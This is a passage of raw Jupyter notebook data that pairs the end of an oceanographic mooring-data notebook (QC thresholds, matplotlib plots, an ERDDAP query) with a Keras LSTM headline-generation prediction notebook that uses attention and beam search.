"#eliminate unlikely wind and pressure extremes\nfor ds, df in dfs.items():\n df['wind_speed (m s-1)'][df['wind_speed (m s-1)']>100] = np.nan\n df['air_pressure'][df['air_pressure']<940] = np.nan\n df['air_temperature'][df['air_temperature']>50] = np.nan\n \n#Arbitrary QC points based on evaluating plot / local characteristics and not broad science boundaries\nwdf.WS[wdf.WS>25] = np.nan\nwdf.RH[wdf.RH<25] = np.nan\nwdf.BP[wdf.BP<975] = np.nan",
"_____no_output_____"
]
],
[
[
"### Plot",
"_____no_output_____"
]
],
[
[
"import matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n### specify primary bulk figure parameters\nfontsize = 10\nlabelsize = 10\n#plotstyle = 'seaborn'\nmax_xticks = 10\nplt.style.use('seaborn-ticks')\nmpl.rcParams['svg.fonttype'] = 'none'\nmpl.rcParams['ps.fonttype'] = 42 #truetype/type2 fonts instead of type3\nmpl.rcParams['pdf.fonttype'] = 42 #truetype/type2 fonts instead of type3\nmpl.rcParams['axes.grid'] = False\nmpl.rcParams['axes.edgecolor'] = 'black'\nmpl.rcParams['axes.linewidth'] = 1.5\nmpl.rcParams['axes.labelcolor'] = 'black'\nmpl.rcParams['grid.linestyle'] = '--'\nmpl.rcParams['grid.linestyle'] = '--'\nmpl.rcParams['xtick.major.size'] = 4\nmpl.rcParams['xtick.minor.size'] = 2\nmpl.rcParams['xtick.major.width'] = 2\nmpl.rcParams['xtick.minor.width'] = 0.5\nmpl.rcParams['ytick.major.size'] = 4\nmpl.rcParams['ytick.minor.size'] = 2\nmpl.rcParams['ytick.major.width'] = 2\nmpl.rcParams['ytick.minor.width'] = 0.5\nmpl.rcParams['ytick.direction'] = 'out'\nmpl.rcParams['xtick.direction'] = 'out'\nmpl.rcParams['ytick.color'] = 'black'\nmpl.rcParams['xtick.color'] = 'black'",
"_____no_output_____"
],
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.dates import YearLocator, WeekdayLocator, MonthLocator, DayLocator, HourLocator, DateFormatter\nimport matplotlib.ticker as ticker\n\nimport cmocean",
"_____no_output_____"
],
[
"fig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['air_temperature'].plot(ax=ax)\n plt.ylabel('Temperature (degC)')\n except:\n pass\nwdf.AT.plot(ax=ax)\nplt.legend(['19BSITAEPR-2A','19BSM-2A'])\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n\nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['air_pressure'].plot(ax=ax)\n plt.ylabel('Pressure (mb)')\n except:\n df['air_pressure (mbar)'].plot(ax=ax)\n plt.ylabel('Pressure (mb)')\nwdf.BP.plot(ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n\nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['relative_humidity'].plot(ax=ax)\n plt.ylabel('RH (%)')\n except:\n pass\nwdf.RH.plot(ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n \nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['wind_speed (m s-1)'].plot(ax=ax)\n plt.ylabel('wind_speed (m/s)')\n except:\n pass\nwdf.WS.plot(ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))\n\nfig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n df['wind_from_direction (degrees true)'].plot(style='.',markersize=3.0,ax=ax)\n plt.ylabel('wind direction (degree)')\n except:\n pass\nwdf.WD.plot(style='.',markersize=4.0,ax=ax)\nax.set_xlim(start_date, end_date)\nax.xaxis.set_major_locator(DayLocator(bymonthday=[1,15]))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,3)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%b %y'))",
"_____no_output_____"
],
[
"wdf.tail()",
"_____no_output_____"
],
[
"df.tail()",
"_____no_output_____"
]
],
[
[
"### Next Steps\n\n**TODO:** Plot top prawler bin/air temp for a SST/Air analysis",
"_____no_output_____"
]
],
[
[
"d = ERDDAP(server=server_url,\n protocol='tabledap',\n response='csv',\n )\n\nd.dataset_id='erddap_19bsitaepr2a_prawler'\n\nd.variables = [\n 'profile_id',\n 'Temperature',\n 'depth',\n \"time\",\n]\n\nd.constraints = {\n 'time>=': '2019-01-01T00:00:00Z',\n 'time<=': '2019-10-10T00:00:00Z',\n}\n\ndf_sst = d.to_pandas(\n index_col='time (UTC)',\n parse_dates=True,\n skiprows=(1,) # units information can be dropped.\n).dropna()\n\ndf_sst.sort_index(inplace=True)\n\ndf_sst.head()",
"_____no_output_____"
],
[
"dfint= df_sst.groupby('profile_id')\nsst,sst_time = [], []\nfor i,cast in enumerate(dfint.groups):\n if (dfint.get_group(cast)['depth (m)'].std() > 5) and (dfint.get_group(cast)['depth (m)'].min() < 5):\n sst_time = sst_time + [dfint.get_group(cast).index[0]]\n #print(dfint.get_group(cast)['Temperature'][0:10])\n sst = sst +[(dfint.get_group(cast)['Temperature'][0:5]).median()]",
"_____no_output_____"
],
[
"fig, ax = plt.subplots(figsize=(12,3))\nfor ds, df in dfs.items():\n try:\n plt.plot(df.index,df['air_temperature'])\n plt.ylabel('Temperature (degC)')\n except:\n pass\nplt.plot(wdf.index,wdf.AT)\nplt.plot(sst_time,sst)\nplt.legend(['19BSITAEPR-2A','19BSM-2A','19BSITAEPR-2A proxy sst'])\nax.set_xlim(start_date, end_date)\nxfmt = mdates.DateFormatter('%d-%b')\nax.xaxis.set_major_locator(DayLocator(bymonthday=15))\nax.xaxis.set_minor_locator(DayLocator(range(0,32,5)))\nax.xaxis.set_minor_formatter(DateFormatter('%d'))\nax.xaxis.set_major_formatter(DateFormatter('%d\\n%b %y'))\nax.xaxis.set_tick_params(which='major', pad=3)\nax.xaxis.set_tick_params(which='minor', pad=5)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e708ea0f6740887aaf88f130fbf2f8d66f38d46a | 61,728 | ipynb | Jupyter Notebook | predict.ipynb | LRParser/How_to_make_a_text_summarizer | 9a1b1247d8b33ef9d2c3800645dd38e9013ee654 | [
"MIT"
] | null | null | null | predict.ipynb | LRParser/How_to_make_a_text_summarizer | 9a1b1247d8b33ef9d2c3800645dd38e9013ee654 | [
"MIT"
] | 3 | 2017-04-28T17:48:14.000Z | 2019-08-15T20:42:28.000Z | predict.ipynb | LRParser/How_to_make_a_text_summarizer | 9a1b1247d8b33ef9d2c3800645dd38e9013ee654 | [
"MIT"
] | 3 | 2017-04-14T13:50:39.000Z | 2021-09-05T15:39:25.000Z | 41.06986 | 1,848 | 0.603502 | [
[
[
"FN = 'predict'",
"_____no_output_____"
]
],
[
[
"if your GPU is busy you can use CPU for predictions",
"_____no_output_____"
]
],
[
[
"import os\n#os.environ['THEANO_FLAGS'] = 'device=cpu,floatX=float32'",
"_____no_output_____"
],
[
"import keras\nkeras.__version__",
"Using TensorFlow backend.\n"
]
],
[
[
"Generate headlines using the \"simple\" model from http://arxiv.org/pdf/1512.01712v1.pdf",
"_____no_output_____"
],
[
"Use indexing of tokens from [vocabulary-embedding](./vocabulary-embedding.ipynb) this does not clip the indexes of the words to `vocab_size`.\n\nUse the index of outside words to replace them with several `oov` words (`oov` , `oov0`, `oov`...) that appear in the same description and headline. This will allow headline generator to replace the oov with the same word in the description",
"_____no_output_____"
]
],
[
[
"FN0 = 'vocabulary-embedding'",
"_____no_output_____"
]
],
[
[
"we will generate predictions using the model generated in this notebook",
"_____no_output_____"
]
],
[
[
"FN1 = 'train'",
"_____no_output_____"
]
],
[
[
"input data (`X`) is made from `maxlend` description words followed by `eos`\nfollowed by headline words followed by `eos`\nif description is shorter than `maxlend` it will be left padded with `empty`\nif entire data is longer than `maxlen` it will be clipped and if it is shorter it will be padded.\n\nlabels (`Y`) are the headline words followed by `eos` and clipped or padded to `maxlenh`\n\nIn other words the input is made from a `maxlend` half in which the description is padded from the left\nand a `maxlenh` half in which `eos` is followed by a headline followed by another `eos` if there is enough space.\n\nThe labels match only the second half and \nthe first label matches the `eos` at the start of the second half (following the description in the first half)",
"_____no_output_____"
],
[
"the model parameters should be identical with what used in training but notice that `maxlend` is flexible",
"_____no_output_____"
]
],
[
[
"maxlend=50 # 0 - if we dont want to use description at all\nmaxlenh=25\nmaxlen = maxlend + maxlenh\nrnn_size = 512\nrnn_layers = 3 # match FN1\nbatch_norm=False",
"_____no_output_____"
]
],
[
[
"the out of the first `activation_rnn_size` nodes from the top layer will be used for activation and the rest will be used to select predicted word",
"_____no_output_____"
]
],
[
[
"activation_rnn_size = 40 if maxlend else 0",
"_____no_output_____"
],
[
"# training parameters\nseed=42\np_W, p_U, p_dense, p_emb, weight_decay = 0, 0, 0, 0, 0\noptimizer = 'adam'\nbatch_size=64",
"_____no_output_____"
],
[
"nb_train_samples = 30000\nnb_val_samples = 3000",
"_____no_output_____"
]
],
[
[
"# read word embedding",
"_____no_output_____"
]
],
[
[
"import cPickle as pickle\n\nwith open('data/%s.pkl'%FN0, 'rb') as fp:\n embedding, idx2word, word2idx, glove_idx2idx = pickle.load(fp)\nvocab_size, embedding_size = embedding.shape",
"_____no_output_____"
],
[
"nb_unknown_words = 10",
"_____no_output_____"
],
[
"print 'dimension of embedding space for words',embedding_size\nprint 'vocabulary size', vocab_size, 'the last %d words can be used as place holders for unknown/oov words'%nb_unknown_words\nprint 'total number of different words',len(idx2word), len(word2idx)\nprint 'number of words outside vocabulary which we can substitue using glove similarity', len(glove_idx2idx)\nprint 'number of words that will be regarded as unknonw(unk)/out-of-vocabulary(oov)',len(idx2word)-vocab_size-len(glove_idx2idx)",
"dimension of embedding space for words 100\nvocabulary size 40000 the last 10 words can be used as place holders for unknown/oov words\ntotal number of different words 1382058 1382058\nnumber of words outside vocabulary which we can substitue using glove similarity 122933\nnumber of words that will be regarded as unknonw(unk)/out-of-vocabulary(oov) 1219125\n"
],
[
"for i in range(nb_unknown_words):\n idx2word[vocab_size-1-i] = '<%d>'%i",
"_____no_output_____"
],
[
"for i in range(vocab_size-nb_unknown_words, len(idx2word)):\n idx2word[i] = idx2word[i]+'^'",
"_____no_output_____"
],
[
"empty = 0\neos = 1\nidx2word[empty] = '_'\nidx2word[eos] = '~'",
"_____no_output_____"
],
[
"import numpy as np\nfrom keras.preprocessing import sequence\nfrom keras.utils import np_utils\nimport random, sys",
"_____no_output_____"
],
[
"def prt(label, x):\n print label+':',\n for w in x:\n print idx2word[w],\n print",
"_____no_output_____"
]
],
[
[
"# Model",
"_____no_output_____"
]
],
[
[
"from keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Dropout, RepeatVector, Merge, TimeDistributedDense\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.embeddings import Embedding\nfrom keras.regularizers import l2\nfrom keras.layers.core import Lambda\nimport keras.backend as K",
"_____no_output_____"
],
[
"# seed weight initialization\nrandom.seed(seed)\nnp.random.seed(seed)",
"_____no_output_____"
],
[
"regularizer = l2(weight_decay) if weight_decay else None",
"_____no_output_____"
]
],
[
[
"## rnn model",
"_____no_output_____"
],
[
"start with a stacked LSTM, which is identical to the bottom of the model used in training",
"_____no_output_____"
]
],
[
[
"rnn_model = Sequential()\nrnn_model.add(Embedding(vocab_size, embedding_size,\n input_length=maxlen,\n W_regularizer=regularizer, dropout=p_emb, weights=[embedding], mask_zero=True,\n name='embedding_1'))\nfor i in range(rnn_layers):\n lstm = LSTM(rnn_size, return_sequences=True, # batch_norm=batch_norm,\n W_regularizer=regularizer, U_regularizer=regularizer,\n b_regularizer=regularizer, dropout_W=p_W, dropout_U=p_U,\n name='lstm_%d'%(i+1)\n )\n rnn_model.add(lstm)\n rnn_model.add(Dropout(p_dense, name='dropout_%d'%(i+1)))",
"_____no_output_____"
]
],
[
[
"### load",
"_____no_output_____"
],
[
"use the bottom weights from the trained model, and save the top weights for later",
"_____no_output_____"
]
],
[
[
"import h5py\ndef str_shape(x):\n return 'x'.join(map(str,x.shape))\n\ndef inspect_model(model):\n print model.name\n for i,l in enumerate(model.layers):\n print i, 'cls=%s name=%s'%(type(l).__name__, l.name)\n weights = l.get_weights()\n for weight in weights:\n print str_shape(weight),\n print\n\ndef load_weights(model, filepath):\n \"\"\"Modified version of keras load_weights that loads as much as it can\n if there is a mismatch between file and model. It returns the weights\n of the first layer in which the mismatch has happened\n \"\"\"\n print 'Loading', filepath, 'to', model.name\n flattened_layers = model.layers\n with h5py.File(filepath, mode='r') as f:\n # new file format\n layer_names = [n.decode('utf8') for n in f.attrs['layer_names']]\n\n # we batch weight value assignments in a single backend call\n # which provides a speedup in TensorFlow.\n weight_value_tuples = []\n for name in layer_names:\n print name\n g = f[name]\n weight_names = [n.decode('utf8') for n in g.attrs['weight_names']]\n if len(weight_names):\n weight_values = [g[weight_name] for weight_name in weight_names]\n try:\n layer = model.get_layer(name=name)\n except:\n layer = None\n if not layer:\n print 'failed to find layer', name, 'in model'\n print 'weights', ' '.join(str_shape(w) for w in weight_values)\n print 'stopping to load all other layers'\n weight_values = [np.array(w) for w in weight_values]\n break\n symbolic_weights = layer.trainable_weights + layer.non_trainable_weights\n weight_value_tuples += zip(symbolic_weights, weight_values)\n weight_values = None\n K.batch_set_value(weight_value_tuples)\n return weight_values",
"_____no_output_____"
],
[
"weights = load_weights(rnn_model, 'data/%s.hdf5'%FN1)",
"Loading data/train.hdf5 to sequential_1\nembedding_1\nlstm_1\ndropout_1\nlstm_2\ndropout_2\nlstm_3\ndropout_3\nsimplecontext_1\ntimedistributed_1\nfailed to find layer timedistributed_1 in model\nweights 944x40000 40000\nstopping to load all other layers\n"
],
[
"[w.shape for w in weights]",
"_____no_output_____"
]
],
[
[
"## headline model",
"_____no_output_____"
],
[
"A special layer that reduces the input just to its headline part (second half).\nFor each word in this part it concatenate the output of the previous layer (RNN)\nwith a weighted average of the outputs of the description part.\nIn this only the last `rnn_size - activation_rnn_size` are used from each output.\nThe first `activation_rnn_size` output is used to computer the weights for the averaging.",
"_____no_output_____"
]
],
[
[
"context_weight = K.variable(1.)\nhead_weight = K.variable(1.)\ncross_weight = K.variable(0.)\n\ndef simple_context(X, mask, n=activation_rnn_size, maxlend=maxlend, maxlenh=maxlenh):\n desc, head = X[:,:maxlend], X[:,maxlend:]\n head_activations, head_words = head[:,:,:n], head[:,:,n:]\n desc_activations, desc_words = desc[:,:,:n], desc[:,:,n:]\n \n # RTFM http://deeplearning.net/software/theano/library/tensor/basic.html#theano.tensor.batched_tensordot\n # activation for every head word and every desc word\n activation_energies = K.batch_dot(head_activations, desc_activations, axes=([2],[2]))\n # make sure we dont use description words that are masked out\n # assert mask.ndim == 2\n activation_energies = K.switch(mask[:, None, :maxlend], activation_energies, -1e20)\n \n # for every head word compute weights for every desc word\n activation_energies = K.reshape(activation_energies,(-1,maxlend))\n activation_weights = K.softmax(activation_energies)\n activation_weights = K.reshape(activation_weights,(-1,maxlenh,maxlend))\n\n # for every head word compute weighted average of desc words\n desc_avg_word = K.batch_dot(activation_weights, desc_words, axes=([2],[1]))\n return K.concatenate((context_weight*desc_avg_word, head_weight*head_words))\n\n\nclass SimpleContext(Lambda):\n def __init__(self,**kwargs):\n super(SimpleContext, self).__init__(simple_context,**kwargs)\n self.supports_masking = True\n\n def compute_mask(self, input, input_mask=None):\n return input_mask[:, maxlend:]\n \n def get_output_shape_for(self, input_shape):\n nb_samples = input_shape[0]\n n = 2*(rnn_size - activation_rnn_size)\n return (nb_samples, maxlenh, n)",
"_____no_output_____"
],
[
"model = Sequential()\nmodel.add(rnn_model)\n\nif activation_rnn_size:\n model.add(SimpleContext(name='simplecontext_1'))",
"_____no_output_____"
],
[
"# we are not going to fit so we dont care about loss and optimizer\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')",
"_____no_output_____"
],
[
"n = 2*(rnn_size - activation_rnn_size)\nn",
"_____no_output_____"
]
],
[
[
"perform the top dense of the trained model in numpy so we can play around with exactly how it works",
"_____no_output_____"
]
],
[
[
"# out very own softmax\ndef output2probs(output):\n output = np.dot(output, weights[0]) + weights[1]\n output -= output.max()\n output = np.exp(output)\n output /= output.sum()\n return output",
"_____no_output_____"
],
[
"def output2probs1(output):\n output0 = np.dot(output[:n//2], weights[0][:n//2,:])\n output1 = np.dot(output[n//2:], weights[0][n//2:,:])\n output = output0 + output1 # + output0 * output1\n output += weights[1]\n output -= output.max()\n output = np.exp(output)\n output /= output.sum()\n return output",
"_____no_output_____"
]
],
[
[
"# Test",
"_____no_output_____"
]
],
[
[
"def lpadd(x, maxlend=maxlend, eos=eos):\n \"\"\"left (pre) pad a description to maxlend and then add eos.\n The eos is the input to predicting the first word in the headline\n \"\"\"\n assert maxlend >= 0\n if maxlend == 0:\n return [eos]\n n = len(x)\n if n > maxlend:\n x = x[-maxlend:]\n n = maxlend\n return [empty]*(maxlend-n) + x + [eos]",
"_____no_output_____"
],
[
"samples = [lpadd([3]*26)]\n# pad from right (post) so the first maxlend will be description followed by headline\ndata = sequence.pad_sequences(samples, maxlen=maxlen, value=empty, padding='post', truncating='post')",
"_____no_output_____"
],
[
"np.all(data[:,maxlend] == eos)",
"_____no_output_____"
],
[
"data.shape,map(len, samples)",
"_____no_output_____"
],
[
"probs = model.predict(data, verbose=0, batch_size=1)\nprobs.shape",
"_____no_output_____"
]
],
[
[
"# Sample generation",
"_____no_output_____"
]
],
[
[
"# variation to https://github.com/ryankiros/skip-thoughts/blob/master/decoding/search.py\ndef beamsearch(predict, start=[empty]*maxlend + [eos], avoid=None, avoid_score=1,\n k=1, maxsample=maxlen, use_unk=True, oov=vocab_size-1, empty=empty, eos=eos, temperature=1.0):\n \"\"\"return k samples (beams) and their NLL scores, each sample is a sequence of labels,\n all samples starts with an `empty` label and end with `eos` or truncated to length of `maxsample`.\n You need to supply `predict` which returns the label probability of each sample.\n `use_unk` allow usage of `oov` (out-of-vocabulary) label in samples\n \"\"\"\n def sample(energy, n, temperature=temperature):\n \"\"\"sample at most n different elements according to their energy\"\"\"\n n = min(n,len(energy))\n prb = np.exp(-np.array(energy) / temperature )\n res = []\n for i in xrange(n):\n z = np.sum(prb)\n r = np.argmax(np.random.multinomial(1, prb/z, 1))\n res.append(r)\n prb[r] = 0. # make sure we select each element only once\n return res\n\n dead_samples = []\n dead_scores = []\n live_samples = [list(start)]\n live_scores = [0]\n\n while live_samples:\n # for every possible live sample calc prob for every possible label \n probs = predict(live_samples, empty=empty)\n assert vocab_size == probs.shape[1]\n\n # total score for every sample is sum of -log of word prb\n cand_scores = np.array(live_scores)[:,None] - np.log(probs)\n cand_scores[:,empty] = 1e20\n if not use_unk and oov is not None:\n cand_scores[:,oov] = 1e20\n if avoid:\n for a in avoid:\n for i, s in enumerate(live_samples):\n n = len(s) - len(start)\n if n < len(a):\n # at this point live_sample is before the new word,\n # which should be avoided, is added\n cand_scores[i,a[n]] += avoid_score\n live_scores = list(cand_scores.flatten())\n \n\n # find the best (lowest) scores we have from all possible dead samples and\n # all live samples and all possible new words added\n scores = dead_scores + live_scores\n ranks = sample(scores, k)\n n = len(dead_scores)\n dead_scores = [dead_scores[r] for r in ranks if r < n]\n dead_samples = [dead_samples[r] for r in ranks if r < n]\n \n live_scores = [live_scores[r-n] for r in ranks if r >= n]\n live_samples = [live_samples[(r-n)//vocab_size]+[(r-n)%vocab_size] for r in ranks if r >= n]\n\n # live samples that should be dead are...\n # even if len(live_samples) == maxsample we dont want it dead because we want one\n # last prediction out of it to reach a headline of maxlenh\n def is_zombie(s):\n return s[-1] == eos or len(s) > maxsample\n \n # add zombies to the dead\n dead_scores += [c for s, c in zip(live_samples, live_scores) if is_zombie(s)]\n dead_samples += [s for s in live_samples if is_zombie(s)]\n \n # remove zombies from the living \n live_scores = [c for s, c in zip(live_samples, live_scores) if not is_zombie(s)]\n live_samples = [s for s in live_samples if not is_zombie(s)]\n\n return dead_samples, dead_scores",
"_____no_output_____"
],
[
"# !pip install python-Levenshtein",
"_____no_output_____"
],
[
"def keras_rnn_predict(samples, empty=empty, model=model, maxlen=maxlen):\n \"\"\"for every sample, calculate probability for every possible label\n you need to supply your RNN model and maxlen - the length of sequences it can handle\n \"\"\"\n sample_lengths = map(len, samples)\n assert all(l > maxlend for l in sample_lengths)\n assert all(l[maxlend] == eos for l in samples)\n # pad from right (post) so the first maxlend will be description followed by headline\n data = sequence.pad_sequences(samples, maxlen=maxlen, value=empty, padding='post', truncating='post')\n probs = model.predict(data, verbose=0, batch_size=batch_size)\n return np.array([output2probs(prob[sample_length-maxlend-1]) for prob, sample_length in zip(probs, sample_lengths)])",
"_____no_output_____"
],
[
"def vocab_fold(xs):\n \"\"\"convert list of word indexes that may contain words outside vocab_size to words inside.\n If a word is outside, try first to use glove_idx2idx to find a similar word inside.\n If none exist then replace all accurancies of the same unknown word with <0>, <1>, ...\n \"\"\"\n xs = [x if x < vocab_size-nb_unknown_words else glove_idx2idx.get(x,x) for x in xs]\n # the more popular word is <0> and so on\n outside = sorted([x for x in xs if x >= vocab_size-nb_unknown_words])\n # if there are more than nb_unknown_words oov words then put them all in nb_unknown_words-1\n outside = dict((x,vocab_size-1-min(i, nb_unknown_words-1)) for i, x in enumerate(outside))\n xs = [outside.get(x,x) for x in xs]\n return xs",
"_____no_output_____"
],
[
"def vocab_unfold(desc,xs):\n # assume desc is the unfolded version of the start of xs\n unfold = {}\n for i, unfold_idx in enumerate(desc):\n fold_idx = xs[i]\n if fold_idx >= vocab_size-nb_unknown_words:\n unfold[fold_idx] = unfold_idx\n return [unfold.get(x,x) for x in xs]",
"_____no_output_____"
],
[
"import sys\nimport Levenshtein\n\ndef gensamples(X=None, X_test=None, Y_test=None, avoid=None, avoid_score=1, skips=2, k=10, batch_size=batch_size, short=True, temperature=1., use_unk=True):\n if X is None or isinstance(X,int):\n if X is None:\n i = random.randint(0,len(X_test)-1)\n else:\n i = X\n print 'HEAD %d:'%i,' '.join(idx2word[w] for w in Y_test[i])\n print 'DESC:',' '.join(idx2word[w] for w in X_test[i])\n sys.stdout.flush()\n x = X_test[i]\n else:\n x = [word2idx[w.rstrip('^')] for w in X.split()]\n \n if avoid:\n # avoid is a list of avoids. Each avoid is a string or list of word indeicies\n if isinstance(avoid,str) or isinstance(avoid[0], int):\n avoid = [avoid]\n avoid = [a.split() if isinstance(a,str) else a for a in avoid]\n avoid = [vocab_fold([w if isinstance(w,int) else word2idx[w] for w in a])\n for a in avoid]\n\n print 'HEADS:'\n samples = []\n if maxlend == 0:\n skips = [0]\n else:\n skips = range(min(maxlend,len(x)), max(maxlend,len(x)), abs(maxlend - len(x)) // skips + 1)\n for s in skips:\n start = lpadd(x[:s])\n fold_start = vocab_fold(start)\n sample, score = beamsearch(predict=keras_rnn_predict, start=fold_start, avoid=avoid, avoid_score=avoid_score,\n k=k, temperature=temperature, use_unk=use_unk)\n assert all(s[maxlend] == eos for s in sample)\n samples += [(s,start,scr) for s,scr in zip(sample,score)]\n\n samples.sort(key=lambda x: x[-1])\n codes = []\n for sample, start, score in samples:\n code = ''\n words = []\n sample = vocab_unfold(start, sample)[len(start):]\n for w in sample:\n if w == eos:\n break\n words.append(idx2word[w])\n code += chr(w//(256*256)) + chr((w//256)%256) + chr(w%256)\n if short:\n distance = min([100] + [-Levenshtein.jaro(code,c) for c in codes])\n if distance > -0.6:\n print score, ' '.join(words)\n # print '%s (%.2f) %f'%(' '.join(words), score, distance)\n else:\n print score, ' '.join(words)\n codes.append(code)\n return samples",
"_____no_output_____"
],
[
"seed = 8\nrandom.seed(seed)\nnp.random.seed(seed)",
"_____no_output_____"
],
[
"X = \"* Billy Joel is looking for a buyer in Sagaponack^ . Now that he and wife Katie Lee Joel are splitting up , the singer is planning to sell the two oceanfront^ properties he bought for her in 2007 . The four-bedroom mansion ( No . 1 ) and smaller beach bungalow^ ( No . 2 ) will be listed with Corcoran 's Biana^ Stepanian^ for a combined $ 35 million . * Richard Bressler^ , the former CFO of Viacom and now a managing\"\nY = \"Billy Joel Lists in Sagaponack^\"",
"_____no_output_____"
],
[
"samples = gensamples(X=X, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"X = \"18 Cake GIFs That 'll Make You Moist\"\nY = \"Is it 350degF^ in here or is it just me ?\"",
"_____no_output_____"
],
[
"samples = gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"X = \"President Barack Obama 's re-election campaign is fundraising off of comments on Obama 's birth certificate by Mitt Romney 's son Matt .\"",
"_____no_output_____"
],
[
"gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1, use_unk=True, short=False);",
"_____no_output_____"
],
[
"X = \"What have you been listening to this year ? If you want to find out using cold , hard evidence , then Spotify 's new Year in Music tool will tell you .\"\nY = \"Spotify Will Make You Smarter for Your App\"",
"_____no_output_____"
],
[
"samples = gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1)",
"_____no_output_____"
],
[
"headline = samples[0][0][len(samples[0][1]):]",
"_____no_output_____"
],
[
"' '.join(idx2word[w] for w in headline)",
"_____no_output_____"
],
[
"avoid = headline",
"_____no_output_____"
],
[
"samples = gensamples(X, avoid=avoid, avoid_score=.1, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"avoid = samples[0][0][len(samples[0][1]):]",
"_____no_output_____"
],
[
"samples = gensamples(X, avoid=avoid, avoid_score=.1, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"len(samples)",
"_____no_output_____"
]
],
[
[
"# Weights",
"_____no_output_____"
]
],
[
[
"def wsimple_context(X, mask, n=activation_rnn_size, maxlend=maxlend, maxlenh=maxlenh):\n desc, head = X[:,:maxlend], X[:,maxlend:]\n head_activations, head_words = head[:,:,:n], head[:,:,n:]\n desc_activations, desc_words = desc[:,:,:n], desc[:,:,n:]\n \n # RTFM http://deeplearning.net/software/theano/library/tensor/basic.html#theano.tensor.batched_tensordot\n # activation for every head word and every desc word\n activation_energies = K.batch_dot(head_activations, desc_activations, axes=([2],[2]))\n # make sure we dont use description words that are masked out\n assert mask.ndim == 2\n activation_energies = K.switch(mask[:, None, :maxlend], activation_energies, -1e20)\n \n # for every head word compute weights for every desc word\n activation_energies = K.reshape(activation_energies,(-1,maxlend))\n activation_weights = K.softmax(activation_energies)\n activation_weights = K.reshape(activation_weights,(-1,maxlenh,maxlend))\n\n return activation_weights\n\n\nclass WSimpleContext(Lambda):\n def __init__(self):\n super(WSimpleContext, self).__init__(wsimple_context)\n self.supports_masking = True\n\n def compute_mask(self, input, input_mask=None):\n return input_mask[:, maxlend:]\n \n def get_output_shape_for(self, input_shape):\n nb_samples = input_shape[0]\n n = 2*(rnn_size - activation_rnn_size)\n return (nb_samples, maxlenh, n)",
"_____no_output_____"
],
[
"wmodel = Sequential()\nwmodel.add(rnn_model)",
"_____no_output_____"
],
[
"wmodel.add(WSimpleContext())",
"_____no_output_____"
],
[
"wmodel.compile(loss='categorical_crossentropy', optimizer=optimizer)",
"_____no_output_____"
]
],
[
[
"## test",
"_____no_output_____"
]
],
[
[
"seed = 8\nrandom.seed(seed)\nnp.random.seed(seed)",
"_____no_output_____"
],
[
"context_weight.set_value(np.float32(1.))\nhead_weight.set_value(np.float32(1.))",
"_____no_output_____"
],
[
"X = \"Representatives of the groups depicted in The Revenant^ spoke with BuzzFeed News about the actor 's Golden Globes speech calling on listeners to `` protect ... indigenous lands . ''\"\nY = \"Native American Groups Officially Respond To Leonardo DiCaprio 's Call To Action\"",
"_____no_output_____"
],
[
"samples = gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"sample = samples[0][0]",
"_____no_output_____"
],
[
"' '.join([idx2word[w] for w in sample])",
"_____no_output_____"
],
[
"data = sequence.pad_sequences([sample], maxlen=maxlen, value=empty, padding='post', truncating='post')\ndata.shape",
"_____no_output_____"
],
[
"weights = wmodel.predict(data, verbose=0, batch_size=1)\nweights.shape",
"_____no_output_____"
],
[
"startd = np.where(data[0,:] != empty)[0][0]\nlenh = np.where(data[0,maxlend+1:] == eos)[0][0]\nstartd, lenh",
"_____no_output_____"
],
[
